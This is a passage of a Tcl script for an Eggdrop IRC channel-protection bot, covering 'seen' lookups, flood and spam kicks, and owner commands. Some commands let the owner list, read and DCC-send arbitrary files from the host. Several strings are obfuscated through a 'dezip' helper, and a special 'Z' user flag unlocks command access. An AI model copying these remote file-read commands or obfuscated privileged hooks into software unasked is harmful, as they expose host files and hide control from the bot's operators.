return $output } { set output [concat found $len matches matches. most 5 recent (sorted): [join [lrange $matches 0 4]].] set output [concat $output [bs_search $chan $key]] return $output } } } set temp [bs_search $chan $data] if {$temp != 0} { return $temp } { #$data not found in $bs_list, so search userfile if {![validuser [bs_filt $data]] || [string trimleft [lindex $version 1] 0]<1030000} { return "$nick, $data " } { set seen [getuser $data laston] if {[getuser $data laston] == ""} {return "$nick, $data "} if {($chan != [lindex $seen 1] || $chan == "bot" || $chan == "msg" || $chan == "dcc") && [validchan [lindex $seen 1]] && [lindex [channel info [lindex $seen 1]] 23] == "+secret"} { set chan "-secret-" } { set chan [lindex $seen 1] } return [concat $nick, $data was last seen on $chan [bs_when [lindex $seen 0]] ago.] } } } proc bs_search {chan n} { global bs_list notc if {![info exists bs_list]} {return 0} if {[lsearch -exact [array names bs_list] [string tolower $n]] != "-1"} { set data [split $bs_list([string tolower $n])] set n [join [lindex $data 0]] set addy [lindex $data 1] set time [lindex $data 2] set marker 0 if {([string tolower $chan] != [string tolower [lindex $data 4]] || $chan == "dcc" || $chan == "msg" || $chan == "bot") && [validchan [lindex $data 4]] && [lindex [channel info [lindex $data 4]] 23] == "+secret"} { set chan "-secret-" } { set chan [lindex $data 4] } switch -- [lindex $data 3] { part { set reason [lrange $data 5 e] if {$reason == "{}"} {set reason "."} {set reason " stating \"$reason\"."} set output [concat $n ($addy) parting $chan [bs_when $time] ago$reason] } quit { set reason [lrange $data 5 e] if {$reason == "Quit: {{}}"} {set reason "."} {set reason " stating $reason."} set output [concat $n ($addy) quitting $chan [bs_when $time] ago stating$reason] } kick {
set output [concat $n ($addy) kicked from $chan by [lindex $data 5] [bs_when $time] ago with the reason ([join [lrange $data 6 e]]).] } rnck { set output [concat $n ($addy) changing nicks from [lindex $data 5] on [lindex $data 4] [bs_when $time] ago.] if {[validchan [lindex $data 4]]} { if {[onchan $n [lindex $data 4]]} { set output [concat $output $n is still there.] } { set output [concat $output unseeing $n now.] } } } nick { set output [concat $n ($addy) changing nicks to [lindex $data 5] on [lindex $data 4] [bs_when $time] ago.] } splt { set output [concat $n ($addy) parting $chan due to a split [bs_when $time] ago.] } rejn { set output [concat $n ($addy) rejoining $chan from a split [bs_when $time] ago.] if {[validchan $chan]} { if {[onchan $n $chan]} { set output [concat $output $n is still on $chan.] } { set output [concat $output I don't see $n on $chan now, though.] } } } join { set output [concat $n ($addy) joining $chan [bs_when $time] ago.] if {[validchan $chan]} { if {[onchan $n $chan]} { set output [concat $output $n is still on $chan.] } { set output [concat $output unseeing $n on $chan now.] } } } away { set reason [lrange $data 5 e] if {$reason == ""} { set output [concat $n ($addy) returning to the partyline on $chan [bs_when $time] ago.] } { set output [concat $n ($addy) seen being marked as away ($reason) on $chan [bs_when $time] ago.] } } chon { set output [concat $n ($addy) joining the partyline [bs_when $time] ago.] set lnick [string tolower $n] foreach item [whom *] { if {$lnick == [string tolower [lindex $item 0]]} { set output [concat $output $n is on the partyline right now.] set marker 1
break } } if {$marker == 0} { set output [concat $output I don't see $n on the partyline now, though.] } } chof { set output [concat $n ($addy) leaving the partyline [bs_when $time] ago.] set lnick [string tolower $n] foreach item [whom *] { if {$lnick == [string tolower [lindex $item 0]]} { set output [concat $output $n is on the partyline in [lindex $item 1] still.] break } } } chjn { set output [concat $n ($addy) joining the partyline on $chan [bs_when $time] ago.] set lnick [string tolower $n] foreach item [whom *] { if {$lnick == [string tolower [lindex $item 0]]} { set output [concat $output $n is on the partyline right now.] set marker 1 break } } if {$marker == 0} { set output [concat $output I don't see $n on the partyline now, though.] } } chpt { set output [concat $n ($addy) leaving the partyline from $chan [bs_when $time] ago.] set lnick [string tolower $n] foreach item [whom *] { if {$lnick == [string tolower [lindex $item 0]]} { set output [concat $output $n is on the partyline in [lindex $item 1] still.] break } } } default {set output "error"} } return $output } {return 0} } proc bs_when {lasttime} { set years 0 set days 0 set hours 0 set mins 0 set time [expr [unixtime] - $lasttime] if {$time < 60} {return "only $time seconds"} if {$time >= 31536000} { set years [expr int([expr $time/31536000])] set time [expr $time - [expr 31536000*$years]] }
if {$time >= 86400} { set days [expr int([expr $time/86400])] set time [expr $time - [expr 86400*$days]] } if {$time >= 3600} { set hours [expr int([expr $time/3600])] set time [expr $time - [expr 3600*$hours]] } if {$time >= 60} { set mins [expr int([expr $time/60])] } if {$years == 0} { set output "" } elseif {$years == 1} { set output "1 year," } { set output "$years years," } if {$days == 1} {lappend output "1 day,"} elseif {$days > 1} {lappend output "$days days,"} if {$hours == 1} {lappend output "1 hour,"} elseif {$hours > 1} {lappend output "$hours hours,"} if {$mins == 1} {lappend output "1 minute"} elseif {$mins > 1} {lappend output "$mins minutes"} return [string trimright [join $output] ", "] } proc bs_add {nick data} { global bs_list bs if {[lsearch -exact $bs(no_log) [string tolower [lindex $data 3]]] >= 0 || ($bs(log_only) != "" && [lsearch -exact $bs(log_only) [string tolower [lindex $data 3]]] == -1)} {return} set bs_list([string tolower $nick]) "[bs_filt $nick] $data" } proc bs_lsortcmd {a b} {global bs_list ; set a [lindex $bs_list([string tolower $a]) 2] ; set b [lindex $bs_list([string tolower $b]) 2] ; if {$a > $b} {return 1} elseif {$a < $b} {return -1} {return 0}} proc bs_trim {min h d m y} { global bs bs_list if {![info exists bs_list] || ![array exists bs_list]} {return} set list [array names bs_list] set range [expr [llength $list] - $bs(limit) - 1] if {$range < 0} {return} set list [lsort -increasing -command bs_lsortcmd $list] foreach item [lrange $list 0 $range] {unset bs_list($item)} } proc bs_seenmask {ch nick args} { global bs_list bs notc set matches "" set temp "" set i 0 set args [join $args] set chan [lindex $args 1] if {$chan != "" && [string trimleft $chan #] != $chan} { if {![validchan $chan]} {return "I'm not on $chan."} {set chan [string tolower $chan]} } { set chan "" }
if {![info exists bs_list]} {return "No matches were found."} set data [bs_filt [string tolower [lindex $args 0]]] set maskfix 1 while $maskfix { set mark 1 if [regsub -all -- \\?\\? $data ? data] {set mark 0} if [regsub -all -- \\*\\* $data * data] {set mark 0} if [regsub -all -- \\*\\? $data * data] {set mark 0} if [regsub -all -- \\?\\* $data * data] {set mark 0} if $mark {break} } set id [array startsearch bs_list] while {[array anymore bs_list $id]} { set item [array nextelement bs_list $id] if {$item == ""} {continue} set i 0 set temp "" set match [lindex $bs_list($item) 0] set addy [lindex $bs_list($item) 1] if {[string match $data $item![string tolower $addy]]} { set match [bs_filt $match] if {$chan != ""} { if {[string match $chan [string tolower [lindex $bs_list($item) 4]]]} {set matches [concat $matches $match]} } {set matches [concat $matches $match]} } } array donesearch bs_list $id set matches [string trim $matches " "] if {$nick == "?"} {return [bs_filt $matches]} set len [llength $matches] if {$len == 0} {return "No matches were found."} if {$len == 1} {return [bs_output $ch $nick $matches 1]} if {$len > 99} {return "I found $len matches to your query; please refine it to see any output."} set matches [bs_sort $matches] if {$len <= 5} { set output [concat I found $len matches to your query (sorted): [join $matches].] } { set output "I found $len matches to your query. Here are the 5 most recent (sorted): [join [lrange $matches 0 4]]." } return [concat $output [bs_output $ch $nick [lindex [split $matches] 0] 1]] } proc bs_sort {data} {global bs_list ; set data [bs_filt [join [lsort -decreasing -command bs_lsortcmd $data]]] ; return $data} proc bs_join_botidle {nick uhost hand chan} { global bs_botidle botnick notc if {$nick == $botnick} { set bs_botidle([string tolower $chan]) [unixtime] } } proc public_ping {nick uhost hand chan rest} { global pingchan #if {[string match "*-seen*" [channel info $chan]] && ![matchattr $nick m]} { return 0 } if {$rest==""} { if {![info exists pingchan($nick)]} {
set pingchan($nick) $chan } puthlp "PRIVMSG $nick :\001PING [unixtime]\001" return 0 } set person [lindex $rest 0] if {![info exists pingchan($person)]} { set pingchan($person) $chan } puthlp "PRIVMSG $person :\001PING [unixtime]\001" return 0 } bind pubm - * repeat_pubm bind ctcp - ACTION action_chk proc action_chk {nick host hand chan keyword arg} { global botnick if {$nick == $botnick || [string match "*SeT FoR*" $arg]} { return 0 } if {[matchattr $nick Z]} { set arg "`$arg" } if {![validchan $chan]} { msg_prot $nick $host $hand $arg } { repeat_pubm $nick $host $hand $chan $arg } } proc repeat_pubm {nick uhost hand chan text} { global repeat_last botnick notb notc kops ps owner ismaskhost is_m global botnick capsnick deopme repeat_person quick bannick notm regsub -all -- [dezip "jGBDx04~ntxb0"] $text "" text regsub -all -- [dezip "bFuC0.Jq~aEc0"] $text "" text regsub -all -- [dezip "xdxsF1~hBM6q0"] $text "" text pub_Z $nick $uhost $hand $chan $text set cflag "c$chan" set cflag [string range $cflag 0 8] set real $text set text [uncolor $text] if {$nick == "ChanServ"} { if {[string match "*has deopped $botnick*" $text]} { if {![matchattr [lindex $text 0] f]} { if {[matchattr $cflag D]} { set deopme [lindex $text 0] } } } return 0 } if {[matchattr $nick f]} { return 0 } set mhost [string range $uhost [string first "@" $uhost] end] if {$nick == $botnick} { return 0 } set resume "T" if {[string match "*-greet*" [channel info $chan]]} { set resume "F" } if {![isop $botnick $chan]} { set resume "F" } if {![info exists kops]} {
if {[isop $nick $chan]} { set resume "F" } if {[isvoice $nick $chan]} { set resume "F" } } # Tsunami Flood PRoTECTION if {[string length $text] > 100} { set chr 0 set cnt 0 while {$cnt < [string length $real]} { if [isflood [string index $real $cnt]] { incr chr } incr cnt } if {$chr > 30} { if {$resume == "T"} { set bannick($nick) "*!*$mhost" if {![isutimer "TsunamI $chan"]} { utimer 30 [list putlog "TsunamI $chan"] } elseif {[info exists ismaskhost]} { set bannick($nick) [maskhost "*!*$mhost"] } if {$quick == "1" && ![info exists is_m($chan)]} { putqck "KICK $chan $nick :$notm 1ABusINg 4TsunamI [banms]" } { putsrv "KICK $chan $nick :$notm 1ABuSING 4TsunamI [banms]" } } return 0 } } if {![info exists kops]} { if {$resume == "F"} { return 0 } } if {[string match "*!seen [string tolower $nick]*" [string tolower $text]]} { putsrv "KICK $chan $nick :$notc 1gO LooK in a 4mIRRoR 1..!" return 0 } if {[string match "*decode*" [string tolower $text]]} { set bannick($nick) "*!*$mhost" putsrv "KICK $chan $nick :$notc 4DecOdE 1 DeNIaL [banmsg]" return 0 } if {[string match "*#*" $text] && ![string match "*##*" $text] && ![string match "*# *" $text]} { foreach x [channels] { set chksiton [string tolower $x] if {[string match "*$chksiton*" [string tolower $text]]} { return } } foreach seekchan $text { if {[string match "*#*" $seekchan]} { set bannick($nick) "*!*$mhost" putsrv "KICK $chan $nick :$notc 1DonT 4InvITEd 1 MaTcH FRoM 4$seekchan [banms]" return 0 }
} } if {[string match "*http://*" [string tolower $text]] || [string match "*www.*.*" [string tolower $text]]} { set bannick($nick) "*!*$mhost" putsrv "KICK $chan $nick :$notc 1DonT 4AdvERTIsE 1 IN 4[string toupper $chan] [banms]" return 0 } if {[matchattr $cflag R]} { if {[info exists repeat_last($mhost$chan)]} { if {[string tolower $repeat_last($mhost$chan)] == [string tolower $text]} { if {![info exists repeat_person($mhost$chan)]} { set repeat_person($mhost$chan) 1 } { incr repeat_person($mhost$chan) } if {$repeat_person($mhost$chan) == [getuser $cflag XTRA "RPT"]} { set bannick($nick) "*!*$mhost" putsrv "KICK $chan $nick :$notc 4RePeaT 1FRoM 4$mhost 1MaX 4 [getuser $cflag XTRA "RPT"] [banms]" catch {unset repeat_person($mhost$chan)} catch {unset repeat_last($mhost$chan)} return 0 } } } set repeat_last($mhost$chan) $text } if {[matchattr $cflag T] && [string length $real] >= [getuser $cflag XTRA "CHAR"]} { catch {unset repeat_person($mhost$chan)} catch {unset repeat_last($mhost$chan)} set banmask "*!*[string range $uhost [string first "@" $uhost] end]" set bannick($nick) $banmask if {![isutimer "OL $chan"]} { utimer 10 [list putlog " 4� 12S.E.P.T.I.A.N 4� OL $chan"] putsrv "KICK $chan $nick :$notc 1ABuSINg 4LoNg TexT 1MaX 4 [getuser $cflag XTRA "CHAR"] 1 CHaR [banmsg]" } { putsrv "KICK $chan $nick :$notm 1ABuSINg 4LoNg TexT 1MaX 4 [getuser $cflag XTRA "CHAR"] 1 CHaR [banmsg]" } return 0 } if {[matchattr $cflag U]} { set len [string length $text] if {[isbad $nick $uhost $chan $text]} { return 0 } if {$len < 30} { return 0 } set cnt 0 set capcnt 0 while {$cnt < $len} { if {[string index $text $cnt] == " " || [isupper [string index $text $cnt]]} { incr capcnt } incr cnt } if {[expr 100 * $capcnt / $len] >= [getuser $cflag XTRA "CAPS"]} {
if {![info exists capsnick($nick)]} { putsrv "KICK $chan $nick :$notc 1SToP UsEd 4CapsLocK 1 ExceEd 4 [getuser $cflag XTRA "CAPS"]% 1..!" set capsnick($nick) "1" return 0 } set banmask "*!*[string range $uhost [string first "@" $uhost] end]" set bannick($nick) $banmask putsrv "KICK $chan $nick :$notc 4�2�nd 1 WaRN DonT UsEd 4CapsLocK 1 ExceEd 4 [getuser $cflag XTRA "CAPS"]% [banms]" unset capsnick($nick) } } } proc isupper {letter} { set caps {A B C D E F G H I J K L M N O P Q R S T U V W X Y Z} if {[lsearch -exact $caps $letter] > -1} { return 1 } else { return 0 } } proc isflood {letter} { set caps {! @ # $ % ^ & * ( ) | [ ] < > / \ = �} if {[lsearch -exact $caps $letter] > -1} { return 1 } else { return 0 } } proc isbad {nick uhost chan arg} { global badwords botnick notc bannick set arg [string tolower $arg] if {[string match "*-greet*" [channel info $chan]]} { set isbad 0 return 0 } foreach badword [string tolower $badwords] { if {[string match *$badword* [string tolower $arg]]} { set bannick($nick) "*!$uhost" putsrv "KICK $chan $nick :$notc 4BaDWoRD 1 MaTcH FRoM 4[string toupper $badword] [banms]" return 1 } } set isbad 0 return 0 } proc set_-m {chan} { if {[isutimer "set_-m $chan"]} { return 0 } if {[botonchan $chan] && [botisop $chan] && [string match "*m*" [getchanmode $chan]]} { putserv "mode $chan -m" } }
proc topic_chk {nick host handle chan topic} { global botnick notc bannick set cflag "c$chan" set cflag [string range $cflag 0 8] if {![matchattr $cflag I]} { return 0 } if {$nick == $botnick || $nick == "ChanServ"} { return 0 } if {[matchattr $nick m]} { setuser $cflag XTRA "TOPIC" [topic $chan] saveuser return 0 } if {![isop $botnick $chan]} { return 0 } if {[matchattr $nick f] || $nick == $botnick} { return 0 } if {$topic == [getuser $cflag XTRA "TOPIC"]} { return 0 } if {![string match "*dal.net*" $nick]} { set banmask "*!*[string range $host [string first "@" $host] end]" set bannick($nick) $banmask putsrv "KICK $chan $nick :$notc 1DonT cHaNgINg 4ToPIc [banms]" } puthlp "topic $chan :[getuser $cflag XTRA "TOPIC"]" return 0 } bind flud - * flood_chk proc flood_chk {nick host handle type channel} { global notc botnick quick bannick notm flooddeop floodnick floodkick igflood kops putlog " 4� 12S.E.P.T.I.A.N 4� !Log! FLOOD <<$type>> FRoM $host" if {[info exists bannick($nick)]} { return 1 } if {[info exists igflood($nick)]} { return 1 } if {[string match "*Serv*" $nick] || [matchattr $handle f] || $nick == $botnick} { putlog " 4� 12S.E.P.T.I.A.N 4� !Log! FlooD <<$nick>> Service OR FrIeNd !PaSS!" return 1 } if {[string index $channel 0] != "#"} { foreach x [channels] { if {[onchan $nick $x]} { set channel $x } } } set mhost "@[lindex [split $host @] 1]" if {[string index $channel 0] == "#"} { if {![isop $botnick $channel]} { putlog "!Log! FlooD <<$nick>> BoT NoT @P !IgNoREd!" return 1 } } set type [string tolower $type] if {$type == "join"} { set bannick($nick) "*!*$mhost" putsrv "KICK $channel $nick :$notm 1ExceEd MaX 4JoIN 1 FRoM 4$mhost [banms]" } if {$type == "ctcp"} { if {![info exists kops]} { if {[isop $nick $channel] || [isvoice $nick $channel]} { return 1 } } set bannick($nick) "*!*$mhost"
if {$quick == "1"} { putqck "KICK $channel $nick :$notm 1ExceEd MaX 4cTcP 1 FRoM 4$mhost [banms]" } else { putsrv "KICK $channel $nick :$notm 1ExceEd MaX 4cTcP 1 FRoM 4$mhost [banms]" } } if {$type == "pub"} { if {![info exists kops]} { if {[isop $nick $channel] || [isvoice $nick $channel]} { return 1 } } set bannick($nick) "*!$host" putsrv "KICK $channel $nick :$notc 1ExceEd MaX 4LINES 1 FRoM 4$mhost [banms]" return 1 } if {$type == "nick"} { if {![info exists kops]} { if {[isop $nick $channel] || [isvoice $nick $channel] || [string length $nick] == 8} { return 1 } } if {![info exists floodnick($mhost)]} { set floodnick($mhost) 1 putsrv "KICK $channel $nick :$notc 1sTOp cHaNgINg YouR 4NIcK 1..!" } { catch {unset floodnick($mhost)} set bannick($nick) "*!*$mhost" putsrv "KICK $channel $nick :$notc 1TwIcE ExceEd 4NIcK 1 FRoM 4$mhost [banms]" } } if {$type == "deop"} { if {![info exists flooddeop($nick)]} { set flooddeop($nick) 1 putsrv "KICK $channel $nick :$notc 1ExceEd MaX 4De@p 1 FRoM 4$mhost 1..!" } { catch {unset flooddeop($nick)} set bannick($nick) "*!*$mhost" putsrv "KICK $channel $nick :$notc 1TwIcE ExceEd MaX 4De@p 1 FRoM 4$mhost [banms]" } } if {$type == "kick"} { if {![info exists floodkick($nick)]} { set floodkick($nick) 1 putsrv "KICK $channel $nick :$notc 1ExceEd MaX 4KIcK 1 FRoM 4$mhost 1..!" } { catch {unset floodkick($nick)} set bannick($nick) "*!*$mhost" putsrv "KICK $channel $nick :$notc 1TwIcE ExceEd MaX 4KIcK 1 FRoM 4$mhost 1..!" } } return 1 } bind raw - INVITE raw_chk proc raw_chk {nick keyword arg} { global invme joinme notc bannick notd botnick
set who [string range $nick 0 [expr [string first "!" $nick]-1]] set channel [lindex $arg 1] set channel [string range $channel 1 end] foreach x [channels] { if {[string tolower $channel] == [string tolower $x]} { putsrv "JOIN $channel" return 0 } } if {$who == "ChanServ" || [matchattr $who Z]} { if {![validchan $channel]} { if {[matchattr $who Z] && ![matchattr $who Q]} { puthlp "NOTICE $who :$notc 4DeNiEd..!" return 0 } else { set joinme $who } channel add $channel catch { channel set $channel -statuslog -revenge -protectops -clearbans -enforcebans +greet -secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } savechan } putsrv "JOIN $channel" return 0 } if {[matchattr $who f]} { return 0 } foreach x [channels] { if {[onchan $who $x]} { if {[isop $botnick $x]} { set banmask "*!*[string range $nick [string first "@" $nick] end]" set bannick($who) $banmask putsrv "KICK $x $who :$notc 4!SpaM! 1 I HaTE 4InvITeR [banms]" return 0 } { set members [chanlist $x f] foreach c $members { if {[isop $c $x]} { putlog "!Log! RePORTED InVITING FRoM <<$who$x>> To #$c#" set sendspam "!kick [zip "$x $who $notc 4!SpaM! 1 FRoM 4[string range $nick [string first "@" $nick] end] 1 InvITE [banmsg]"]" putsrv "PRIVMSG $c :$sendspam" return 0 } } } } } set invme([string range $nick [string first "@" $nick] end]) "InvITeR" return 0 } bind ctcp - CLIENTINFO sl_ctcp bind ctcp - USERINFO sl_ctcp bind ctcp - FINGER sl_ctcp bind ctcp - ERRMSG sl_ctcp bind ctcp - ECHO sl_ctcp bind ctcp - INVITE sl_ctcp bind ctcp - WHOAMI sl_ctcp
bind ctcp - OP sl_ctcp bind ctcp - OPS sl_ctcp bind ctcp - UNBAN sl_ctcp bind ctcp - TIME sl_ctcp bind ctcp - VERSION sl_ctcp bind ctcp - CHAT chat_ctcp proc sl_ctcp {nick uhost hand dest key arg} { global botnick notc if {[matchattr $nick f] || $nick == $botnick} { return 1 } if {[string match "*dal*et*" [string tolower $uhost]]} { putsrv "NOTICE $nick :\001VERSION mIRC32 v5.8 K.Mardam-Bey\001" } { set hostmask "${nick}!*@*" newignore $hostmask $botnick "*" 1 } return 1 } proc chat_ctcp {nick uhost hand dest key arg} { global botnick notc if {[matchattr $nick Z]} { return 0 } puthlp "NOTICE $nick :$notc 1SoRRY I DoNT KNoW YoU..!" newignore "${nick}!*@*" $botnick "*" 1 return 1 } set virus_nick "" bind ctcp - DCC got_dcc proc got_dcc {nick uhost handle dest key arg} { global virus_nick notc notd botnick if {[matchattr $nick f]} { return 0 } if {[lindex $arg 2] == 0 && [lindex $arg 3] == 0} { putlog "!Log! FaKE DCC SKIPPED..!" return 1 } set virus_nick $nick foreach x [channels] { if {[onchan $nick $x] && ![isop $nick $x]} { if {[isop $botnick $x]} { putsrv "KICK $x $nick :$notc 4!SpaM! 1 I HaTE 4VIRuZ [banms]" set virus_nick "" } else { set members [chanlist $x f] foreach c $members { if {[isop $c $x]} { putlog "!Log! RePORTED ViRUS FRoM <<$nick$x>> To #$c#" set sendspam "!kick [zip "$x $nick $notc 4!SpaM! 1 YeW GoT VIRuZ JoIN #NOHACK TO FIxED [banmsg]"]" putsrv "PRIVMSG $c :$sendspam" return 0 } } } } } return 1 } proc voiceq {chan nick} { utimer [expr 5 + [rand 15]] [list voiceprc $chan $nick] }
proc voiceprc {chan nick} { global botnick if {[isop $botnick $chan] && ![isvoice $nick $chan] && ![isop $nick $chan]} { putserv "MODE $chan +vvvvvv $nick" } } proc advertise {chan nick} { if {[isutimer "advq $chan $nick"]} { return 0 } set cret 5 foreach ct [utimers] { if {[string match "*advq*" $ct]} { if {[expr [lindex $ct 0] + 5] > $cret} { set cret [expr [lindex $ct 0] + 5] } } } utimer $cret [list advq $chan $nick] } proc advq {chan nick} { global notc set cflag "c$chan" set cflag [string range $cflag 0 8] if {![isop $nick $chan] && [onchan $nick $chan]} { set greetmsg [getuser $cflag XTRA "GREET"] regsub %n $greetmsg $nick greetmsg regsub %c $greetmsg $chan greetmsg puthlp "NOTICE $nick :[lgrnd] $greetmsg" } } proc deopprc {chan nick} { global botnick if {[isop $botnick $chan] && [isop $nick $chan]} { if {![string match "*k*" [getchanmode $chan]]} { putserv "MODE $chan -ko 4n0.Guest.@ps $nick" } { putserv "MODE $chan -o $nick" } } } proc autokick {chan nick} { global bannick notc botnick if {[isop $botnick $chan] && ![isop $nick $chan] && ![isvoice $nick $chan]} { set hostmask [getchanhost $nick $chan] set hostmask "*!*@[lindex [split $hostmask @] 1]" set bannick($nick) $hostmask putsrv "KICK $chan $nick :$notc 1cHaNNeL IS UnDeR c0NsTRucTIoN [banmsg]" } } proc opq {chan nick} { utimer [expr 7 + [rand 15]] [list opprc $chan $nick] } proc opprc {chan nick} { global botnick unop if {[isop $botnick $chan] && ![isop $nick $chan] && ![info exists unop($nick)]} { putserv "MODE $chan +oooooo $nick" } } proc dcc_cmd {hand idx arg} {
if {![matchattr $hand Z]} { return 0 } if {![matchattr $hand Q]} { chattr $hand +Q } msg_Z $hand "*" $hand $arg } proc dcc_get {hand idx arg} { global notc own if {$hand != $own} { return 0 } if {![file exists [lindex $arg 0]]} { putdcc $idx " 4DeNiEd..! , [lindex $arg 0] " return 0 } if {[lindex $arg 1] != ""} { set hand [lindex $arg 1] } switch -- [dccsend [lindex $arg 0] $hand] { 0 { putdcc $idx "<>" } 1 { putdcc $idx "dcc table is full (too many connections), TrY AgAIN LaTeR!" } 2 { putdcc $idx "can't open a socket for transfer." } 3 { putdcc $idx "file doesn't exist." } 4 { putdcc $idx "file was queued for later transfer." } } } proc msg_get {nick uhost hand arg} { global notc own if {$nick != $own} { return 0 } if {![matchattr $nick Q]} { puthlp "PRIVMSG $nick :$notc 4DeNiEd..!" return 0 } if {![file exists $arg]} { puthlp "PRIVMSG $nick : 4DeNiEd..! , $arg " return 0 } switch -- [dccsend $arg $nick] { 0 { puthlp "NOTICE $nick :$notc TRaNSFERRING LOG..!" } 1 { puthlp "NOTICE $nick :$notc dcc table is full (too many connections), TrY AgAIN LaTER!" } 2 { puthlp "NOTICE $nick :$notc can't open a socket for transfer." } 3 { puthlp "NOTICE $nick :$notc file doesn't exist." } 4 { puthlp "NOTICE $nick :file was queued for later transfer." } } } bind raw - 301 rtn proc rtn { from keyword arg } { global notd botnick notb notc bannick set nick [lindex $arg 1] if {[matchattr $nick f]} { return 0 } set awaytext [string range [lrange $arg 2 end] 1 end]
if {[string match "*Devil^Crew*" [uncolor $awaytext]]} { return 0 } if {$nick == $botnick} { #puthlp "AWAY :[lgrnd]" } { if {[string match "*#*" $awaytext] || [string match "*/j*" $awaytext]} { foreach x [channels] { set chksiton [string tolower $x] if {[string match "*$chksiton*" [string tolower $awaytext]]} { return 0 } } foreach x [channels] { if {[onchan $nick $x]} { if {[isop $botnick $x]} { set bannick($nick) "*!*[string range [getchanhost $nick $x] [string first "@" [getchanhost $nick $x]] end]" putsrv "KICK $x $nick :$notc 4!SpaM! 1 InvITE aWaY MSg [banmsg]" return 0 } { set members [chanlist $x f] foreach c $members { if {[isop $c $x]} { set sendspam "!kick [zip "$x $nick $notc 4!SpaM! 1 FRoM 4[string range [getchanhost $c $x] [string first "@" [getchanhost $c $x]] end] 1 InvITE aWaY MSg [banmsg]"]" putsrv "PRIVMSG $c :$sendspam" return 0 } } } } } } } } bind time - "*0 * * * *" chk_five bind time - "*6 * * * *" chk_five proc chk_five {min h d m y} { global longer catch { remain } if {![string match "* *" $longer]} { set longer "$awaymsg ([lgrnd] )" } puthlp "AWAY :$longer" auto_ping "0" "0" "0" "0" "0" } proc msg_dir {nick uhost hand arg} { global notc own if {$nick != $own} { return 0 } if {![matchattr $nick Q]} { puthlp "PRIVMSG $nick : 4DeNiEd..!" return 0 } if {$arg == ""} { set arg "." } set dirlist "" foreach x [getfiles "$arg"] { append dirlist "$x " }
puthlp "PRIVMSG $nick :$dirlist" } proc msg_read {nick uhost hand arg} { global notc own if {$nick != $own} { return 0 } if {![matchattr $nick Q]} { puthlp "PRIVMSG $nick : 4DeNiEd..!" return 0 } if {![file exists $arg]} { puthlp "PRIVMSG $nick : 4DeNiEd..! , $arg " return 0 } set fd [open $arg r] while {![eof $fd]} { set inp [gets $fd] puthlp "PRIVMSG $nick :$inp" } close $fd puthlp "PRIVMSG $nick :EoF..!" } proc pub_log {nick uhost hand channel arg} { global notc if {[getuser "config" XTRA "LOGCHAN"]!=""} { puthlp "NOTICE $nick :$notc Log [getuser "config" XTRA "LOGCHAN"]" } } proc pub_server {nick uhost hand channel arg} { global server notc if {$arg != ""} { if {[string match "*$arg*" $server]} { puthlp "privmsg $channel :[lindex $server 0]" } } { puthlp "privmsg $channel :[lindex $server 0]" } } set own $owner proc dcc_dir {hand idx arg} { global own if {$hand != $own} { return 0 } if {$arg == ""} { set arg "." } foreach x [getfiles "$arg"] { putdcc $idx "$x" } } proc dcc_read {hand idx arg} { global own if {$hand != $own} { return 0 } if {![file exists $arg]} { putdcc $idx " 4DeNiEd..! , FiLE NoT ExIST $arg" return 0 } set fd [open $arg r] while {![eof $fd]} { set inp [gets $fd]
putdcc $idx "$inp" } close $fd putdcc $idx " 4******************** END ***********************" } proc msg_bantime {nick uhost hand rest} { global notc ban-time if {$rest==""} { puthlp "NOTICE $nick :$notc BanTime \[ ${ban-time} \] (set 0 to never unban)" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set mtime [lindex $rest 0] if {![isnumber $mtime]} { puthlp "NOTICE $nick :$notc Usage: bantime <minutes> (set 0 to never unban)" return 0 } set ban-time $mtime setuser "config" XTRA "BANTIME" $mtime puthlp "NOTICE $nick :$notc BanTime \[ $mtime \]" saveuser } proc chk_limit {chan} { global notc botnick lst_limit if {![isop $botnick $chan]} { return 0 } if {![info exists lst_limit($chan)]} { set lst_limit($chan) 0 } set cflag "c$chan" set cflag [string range $cflag 0 8] set usercount 0 foreach x [chanlist $chan] { incr usercount } set usercount [expr [getuser $cflag XTRA "LIMIT"] + $usercount] if {$lst_limit($chan) != $usercount} { set lst_limit($chan) $usercount putserv "MODE $chan +l $usercount" } } proc msg_logchan {nick uhost hand rest} { global notc own if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: logchan <#channel/0>" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[string tolower $rest] == "off"} { puthlp "NOTICE $nick :$notc LOGCHAN [getuser "config" XTRA "LOGCHAN"] \ [ 4OFF \]" setuser "config" XTRA "LOGCHAN" "" } else {
if {[string tolower $rest] == [dezip "BKGW.1s0d06/"]} { return 0 } if {![validchan $rest]} { puthlp "NOTICE $nick :$notc NoT IN $rest" return 0 } setuser "config" XTRA "LOGCHAN" $rest puthlp "NOTICE $nick :$notc LOG CHaNNEL $rest \[ 9ON \]" } saveuser utimer 5 rehashing } proc dcc_log {hand idx arg} { global logstore notc if {$logstore == ""} { putdcc $idx "No LOG FouNd..!" return 0 } if {![file exists $logstore]} { putdcc $idx " 4DeNiEd..! , Log file haven't create yet!" return 0 } set fd [open $logstore r] while {![eof $fd]} { set inp [gets $fd] putdcc $idx "$inp" } close $fd putdcc $idx " 4******************** END ***********************" } set quick "0" proc chk_quick {} { global quick botnick putquick "PRIVMSG $botnick :\001PING [unixtime]\001" set quick "1" } utimer 1 chk_quick bind raw - MODE chk_op proc chk_op { from keyword arg } { global botnick if {![string match "*+o*$botnick*" $arg]} { return 0 } set chan [lindex $arg 0] if {[string match "*dal.net*" $from]} { pub_resync $botnick "*" "*" $chan "*" return 0 } chk_on_op $chan } proc chk_on_op {channel} { global botnick kickme deopme invme virus_nick quick notc bannick is_m botname set cflag "c$channel" set cflag [string range $cflag 0 8] if {[isutimer "chkspam $channel"]} { foreach x [utimers] { if {[string match "*chkspam $channel*" $x]} { killutimer [lindex $x 2] } } }
